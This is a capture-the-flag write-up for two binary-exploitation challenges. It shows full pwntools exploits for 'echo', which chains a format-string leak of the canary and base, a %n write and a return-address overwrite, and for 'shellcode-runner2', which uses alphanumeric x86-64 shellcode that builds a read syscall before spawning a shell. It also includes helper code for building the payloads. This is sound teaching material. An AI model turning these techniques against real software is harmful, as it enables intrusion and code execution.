2022-11-13
<h1>🌓echo</h1>
<h2>🌙Analysis</h2>
<p>Checking the protections with checksec:</p>
<p><img src="https://pic1.imgdb.cn/item/6370b47616f2c2beb1d88caa.png" alt="" /> </p>
<p>Every protection is turned on.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b52216f2c2beb1da3d57.png" alt="" /> </p>
<p>The program has two vulnerabilities: a printf format string bug (the input is used directly as the format string) and a stack buffer overflow through scanf's unbounded %s.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b60e16f2c2beb1db703e.png" alt="" /> </p>
<p>The program also contains a function that spawns a shell directly (a getshell function).</p>
<p><img src="https://pic1.imgdb.cn/item/6370b5af16f2c2beb1db0ab8.png" alt="" /> </p>
<p>When I tried to run it, it turned out to need glibc 2.34, which I did not have, so I had to work blind against the remote service. First, the goals:</p>
<ul>
<li>Leak the ELF load base</li>
<li>Leak the canary value</li>
<li>Overwrite the saved return address with the getshell function</li>
</ul>
<p>The first two goals can be met with the arbitrary read that the format string bug provides.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b6d616f2c2beb1dc7287.png" alt="" /> </p>
<p>The canary and a pointer into the ELF's code are easy to spot: they sit at format-string argument offsets 19 and 21 respectively (%19$p and %21$p).</p>
<p><img src="https://pic1.imgdb.cn/item/6370b74f16f2c2beb1dd389a.png" alt="" /> </p>
<p>What remains is to set the global variable can_leave to a non-zero value, which is done with the arbitrary write from the format string bug (%n). Note that printf stops processing the format string at the first "\x00", and a PIE address always contains NUL bytes, so the address of can_leave has to be placed after the %n specifier rather than in front of it.</p>
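<p>As an added example (not part of the original write-up), the following Python reproduces the payload construction the exploit in the next section performs and adds the checks a practitioner would want before firing: it parses the two %p leaks out of a constructed sample of the echoed output, verifies that the canary's low byte is zero and that the recovered PIE base is page aligned, builds the %n write with the pointer placed after the specifier and padded onto a whole 8-byte argument slot, and rejects an overflow payload containing any byte that scanf("%s") would treat as whitespace. The offsets 0x135A, 0x1264 and 0x401C, the 104 bytes between buffer and canary, and the buffer sitting at format argument 6 (implied by %7$n hitting the pointer at byte offset 8) are taken from the exploit; the sample output is constructed and the helper names are mine.</p>

```python
import re
import struct

# Offsets inside the PIE binary, taken from the exploit.
LEAK_TO_BASE = 0x135A      # %21$p points here relative to the load base
GETSHELL_OFF = 0x1264      # the getshell function
CAN_LEAVE_OFF = 0x401C     # the can_leave flag
BUF_LEN = 104              # bytes from the start of the buffer to the canary
SCANF_WS = frozenset(b' \t\n\v\f\r')   # scanf("%s") stops on any of these


def p64(value):
    """Little-endian 8-byte pack, same as pwntools' p64."""
    return struct.pack('<Q', value)


def parse_leaks(echoed):
    """Pull the canary (%19$p) and the code pointer (%21$p) out of the echoed
    output and sanity-check them: a glibc x86-64 canary has a zero low byte,
    and the PIE base derived from the code pointer must be page aligned.
    Returns (canary, elf_base)."""
    values = [int(tok, 16) for tok in re.findall(rb'0x[0-9a-fA-F]+', echoed)]
    if len(values) < 2:
        raise ValueError('expected two %p leaks in the output')
    canary, code_ptr = values[0], values[1]
    if canary & 0xff or canary >> 64:
        raise ValueError(f'not a canary: {canary:#x}')
    base = code_ptr - LEAK_TO_BASE
    if base & 0xfff:
        raise ValueError(f'base {base:#x} is not page aligned; wrong offset?')
    return canary, base


def build_n_write(target, buf_arg_index):
    """Format string that makes printf store a small non-zero count at
    `target` via %N$n.  The pointer goes AFTER the specifier: a PIE address
    contains NUL bytes and printf stops reading the format at the first NUL.
    The 'a' prefix both supplies the count %n stores and pads the format so
    that the pointer lands in a whole 8-byte argument slot.
    Returns (payload, value_written)."""
    for count in range(1, 17):
        for idx in range(buf_arg_index, buf_arg_index + 8):
            fmt = b'a' * count + b'%%%d$n' % idx
            if len(fmt) % 8 == 0 and idx == buf_arg_index + len(fmt) // 8:
                return fmt + p64(target), count
    raise ValueError('could not align the pointer to an argument slot')


def build_ret_overwrite(canary, new_ret):
    """Overflow layout: buffer | canary | saved rbp | return address.
    scanf("%s") stops at whitespace, so a canary or address containing such a
    byte cannot be delivered; reject the payload and let the caller retry."""
    payload = b'a' * BUF_LEN + p64(canary) + b'a' * 8 + p64(new_ret)
    bad = [b for b in payload if b in SCANF_WS]
    if bad:
        raise ValueError(f'payload contains scanf whitespace byte {bad[0]:#x}')
    return payload


if __name__ == '__main__':
    # Constructed sample of what the echo loop prints back for "%19$p,\x00 %21$p".
    sample = b'Input:0x8f1e2d3c4b5a6900,\nInput:0x55e4c2a4335a\nInput:'
    canary, base = parse_leaks(sample)
    print(hex(canary), hex(base))
    print(build_n_write(base + CAN_LEAVE_OFF, 6))
    print(build_ret_overwrite(canary, base + GETSHELL_OFF))
```

<p>With the sample leak the builder reproduces the exploit's <code>aaaa%7$n</code> payload exactly; the alignment check is what tells you the argument index to use when the prefix length changes.</p>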
<h2>🌙Exploit</h2>
<pre><code class="language-python">from pwn import *
# context.log_level = 'debug'
# o = process('./chall')
o = remote('chal.hkcert22.pwnable.hk', 28037)

# Step 1: leak the canary (argument 19) and a .text pointer (argument 21)
# through the format string bug.
payload = b"%19$p,\x00 %21$p"
o.recvuntil(b'Input:')
o.sendline(payload)
o.recvuntil(b'0x')
canary = int(o.recv(16), 16)
o.recvuntil(b'0x')
elf_addr = int(o.recv(12), 16)
log.info('canary: ' + hex(canary))
log.info('elf_addr: ' + hex(elf_addr))
elf_base = elf_addr - 0x135A
getshell = elf_base + 0x1264
can = elf_base + 0x401C

# Step 2: %n stores the number of characters printed so far (4) into can_leave.
# The pointer comes after the specifier because it contains NUL bytes.
payload = b'aaaa%7$n' + p64(can)
o.recvuntil(b'Input:')
o.sendline(payload)

# Step 3: overflow via scanf("%s"), keep the canary intact, skip the saved rbp
# and replace the return address with getshell.
payload = b'a' * 104 + p64(canary) + b'a' * 8 + p64(getshell)
o.recvuntil(b'Input:')
o.sendline(payload)
o.sendline(b'--')
o.interactive()
</code></pre>
<p><img src="https://pic1.imgdb.cn/item/6370c0ff16f2c2beb1eb69f7.png" alt="" /></p>
<h2>🌙Attachment</h2>
<p><a href="https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78">https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78</a>
echo.zip (FlowUs share)</p>
<h1>🌓shellcode-runner2</h1>
<h2>🌙Analysis</h2>
<p><img src="https://pic1.imgdb.cn/item/6370b9ee16f2c2beb1e11103.png" alt="" /> </p>
<p>The challenge is shellcode injection, but the shellcode is restricted to uppercase letters and digits. For a 32-bit x86 binary one could simply generate it with alpha3, but this is an x86-64 binary, so the shellcode has to be written by hand.</p>
<p>The register values at the moment of the jump into the shellcode are:</p>
<p><img src="https://pic1.imgdb.cn/item/6370bd9116f2c2beb1e55d44.png" alt="" /> </p>
<p>My idea was to issue a read system call: rdi has to be 0, rsi is left alone, and rdx only needs to be some large number. Building execve("/bin/sh", 0, 0) under the charset restriction would be harder than that, so it is easier to let read overwrite the shellcode buffer with a second stage, which is then free of any restriction.</p>
<p>Implementing the read system call:</p>
<pre><code>push rax
pop rcx # rcx = shellcode address (rax holds it on entry)
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax # rax = 0 (the xor cleared the low dword of the pushed rsi)
xor al, 0x39
xor al, 0x36
push rax
pop rdx # 0x39 ^ 0x36 = 0x0f, moved into rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax # rax = 0 again
xor DWORD PTR [rcx+rax*2+0x30], edx # shellcode+0x30 ^= 0x0f
xor al, 0x36
xor al, 0x33
push rax
pop rdx # 0x36 ^ 0x33 = 0x05, moved into rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax # rax = 0 again
xor DWORD PTR [rcx+rax*2+0x31], edx # shellcode+0x31 ^= 0x05; with +0x30 this forms 0f 05 = syscall
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rdx # padding so execution falls through to the syscall at shellcode+0x30; rdx = shellcode address
</code></pre>
<p>When the syscall executes the registers are rax = 0 (SYS_read), rdi = 0 (stdin), rsi = shellcode (the destination buffer) and rdx = shellcode address (a large enough count). One caveat: xor DWORD PTR [rax], esi only clears the low 32 bits of the pushed rsi, so the pop rax that follows yields 0 only when the shellcode buffer is mapped below 4 GiB.</p>
<p>Then send an ordinary shellcode as the second input. Remember to prefix it with a run of nop instructions: read overwrites the buffer from its start, but execution resumes right after the syscall, at shellcode+0x32, so the bytes there must be a sled into the new shellcode.</p>
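<p>As an added example that is not part of the original write-up, the Python below hand-assembles the listing above into bytes (my own encoding from the x86-64 opcode tables, not taken from the page) and checks the constraints that make the trick work: every byte must be in [0-9A-Z], the disp8 in xor DWORD PTR [rcx+rax*2+disp8] must itself be alphanumeric (so writes can only land at offsets 0x30-0x39 and 0x41-0x5A), and each target byte must be the XOR of two alphanumeric immediates, which rules out anything with the top bit set. It also generalises the page's construction into a small builder that emits a stage writing any short byte string just past its own end, modelling the writes as XORs onto zero-filled memory; that the bytes following the stage are zero is an assumption the original relies on at shellcode+0x30, and the function names are mine.</p>

```python
# Helpers for the alphanumeric x86-64 read() stage described above.
ALNUM = frozenset(b'0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ')

# Single-byte encodings used by the stage (all alphanumeric).
PUSH_RAX, PUSH_RCX, PUSH_RSP, PUSH_RSI = b'P', b'Q', b'T', b'V'   # 50 51 54 56
POP_RAX, POP_RCX, POP_RDX = b'X', b'Y', b'Z'                       # 58 59 5a
XOR_MEM_RAX_ESI = b'10'     # 31 30       xor dword [rax], esi
XOR_AL_IMM = b'4'           # 34 ib       xor al, imm8
XOR_MEM_RCX_RAX2 = b'1TA'   # 31 54 41 db xor dword [rcx+rax*2+disp8], edx

# rax = 0 idiom: push rsi; push rsp; pop rax; xor dword [rax], esi; pop rax.
# Caveat: only the LOW 32 bits of the pushed rsi are cleared, so this yields
# 0 only when the shellcode buffer lies below 4 GiB.
ZERO_RAX = PUSH_RSI + PUSH_RSP + POP_RAX + XOR_MEM_RAX_ESI + POP_RAX

# Hand assembly of the page's listing (my encoding, not from the page).
STAGE1_PAGE = (PUSH_RAX + POP_RCX                                   # rcx = buffer
               + ZERO_RAX + XOR_AL_IMM + b'9' + XOR_AL_IMM + b'6'   # al = 0x0f
               + PUSH_RAX + POP_RDX + ZERO_RAX
               + XOR_MEM_RCX_RAX2 + b'0'                            # [buf+0x30] ^= 0x0f
               + XOR_AL_IMM + b'6' + XOR_AL_IMM + b'3'              # al = 0x05
               + PUSH_RAX + POP_RDX + ZERO_RAX
               + XOR_MEM_RCX_RAX2 + b'1'                            # [buf+0x31] ^= 0x05
               + (PUSH_RCX + POP_RCX) * 3                           # padding
               + PUSH_RCX + POP_RDX)                                # rdx = buffer (count)


def is_alnum(code):
    """True when every byte of `code` is in [0-9A-Z]."""
    return all(b in ALNUM for b in code)


def xor_al_pair(target):
    """Two alphanumeric imm8 values (a, b) with a ^ b == target, or None.
    Both are below 0x80, so bytes with the top bit set are unreachable."""
    for a in sorted(ALNUM):
        b = a ^ target
        if b in ALNUM and a <= b:
            return a, b
    return None


def build_stage(tail):
    """Alphanumeric stage that XORs `tail` into the zero-filled bytes directly
    after itself (so the tail executes next), then sets rdx = buffer address.
    Same structure as the listing above.  Returns (code, [(disp, byte), ...])."""
    body = PUSH_RAX + POP_RCX + ZERO_RAX                 # rcx = buffer, rax = 0
    pieces = []
    for value in tail:
        pair = xor_al_pair(value)
        if pair is None:
            raise ValueError(f'0x{value:02x} is not the XOR of two alnum bytes')
        piece = XOR_AL_IMM + bytes([pair[0]]) + XOR_AL_IMM + bytes([pair[1]])
        piece += PUSH_RAX + POP_RDX + ZERO_RAX           # edx = value, rax = 0
        pieces.append(piece)
    # Each write costs 4 bytes (31 54 41 disp); +2 for the final push rcx; pop rdx.
    body_len = len(body) + sum(len(p) + 4 for p in pieces) + 2
    # First alphanumeric disp8 at or past the end of the code that keeps every
    # disp alphanumeric and leaves an even amount of push/pop padding.
    disp = next(d for d in range(body_len, 0x5b)
                if all((d + i) in ALNUM for i in range(len(tail)))
                and (d - body_len) % 2 == 0)
    code = body
    for i, piece in enumerate(pieces):
        code += piece + XOR_MEM_RCX_RAX2 + bytes([disp + i])
    code += (PUSH_RCX + POP_RCX) * ((disp - body_len) // 2)
    code += PUSH_RCX + POP_RDX     # rdx = buffer address: a big read() count
    return code, [(disp + i, v) for i, v in enumerate(tail)]


def apply_writes(code_len, writes, tail_len=4):
    """Model the dword XORs landing on zero-initialised memory past the stage;
    edx holds only a low byte, so each write changes exactly one byte."""
    mem = bytearray(tail_len)
    for disp, value in writes:
        mem[disp - code_len] ^= value
    return bytes(mem)


if __name__ == '__main__':
    print(is_alnum(STAGE1_PAGE), len(STAGE1_PAGE), STAGE1_PAGE)
    code, writes = build_stage(b'\x0f\x05')      # 0f 05 = syscall
    print(is_alnum(code), len(code), writes, apply_writes(len(code), writes))
```

<p>Both the hand-assembled listing and the generated stage are exactly 0x30 bytes, which is why the page's displacements are 0x30 and 0x31: they are the first alphanumeric offsets at or beyond the end of the code, so the syscall is assembled immediately after the last instruction and the second read's buffer is entered at offset 0x32.</p>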
<h2>🌙Exploit</h2>
<pre><code class="language-python">from pwn import *
context.arch = 'amd64'
# o = process('./chall')
o = remote('chal.hkcert22.pwnable.hk', 28130)

# Stage 1: alphanumeric stub that builds a syscall instruction at offset 0x30
# and sets up read(0, shellcode, shellcode_addr).
shellcode = '''
push rax
pop rcx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor al, 0x39
xor al, 0x36
push rax
pop rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor DWORD PTR [rcx+rax*2+0x30], edx
xor al, 0x36
xor al, 0x33
push rax
pop rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor DWORD PTR [rcx+rax*2+0x31], edx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rdx
'''
shellcode = asm(shellcode)
print(shellcode)   # every byte should be in [0-9A-Z]
o.sendline(shellcode)

# Stage 2: read() overwrites the buffer; execution resumes at offset 0x32,
# inside the nop sled, so the unrestricted shellcode runs next.
payload = asm('nop') * 0x50 + asm(shellcraft.sh())
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic1.imgdb.cn/item/6370be2916f2c2beb1e6284d.png" alt="" /></p>
<h2>🌙Attachment</h2>
<p><a href="https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d">https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d</a>
shellcode-runner2.zip (FlowUs share)</p>